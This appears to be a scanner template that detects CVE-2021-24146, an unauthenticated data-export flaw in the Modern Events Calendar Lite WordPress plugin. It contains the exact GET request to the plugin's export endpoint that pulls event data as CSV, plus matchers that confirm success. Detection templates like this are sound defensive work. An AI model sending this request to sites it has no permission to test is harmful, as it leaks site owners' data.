id: CVE-2021-24146 info: name: Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export description: Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example. author: random_robbie severity: high reference: https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc tags: wordpress,wp-plugin,cve,cve2021 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.50 cve-id: CVE-2021-24146 cwe-id: CWE-284 requests: - method: GET path: - "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv" matchers-condition: and matchers: - type: word words: - "mec-events" - "text/csv" condition: and part: header - type: status status: - 200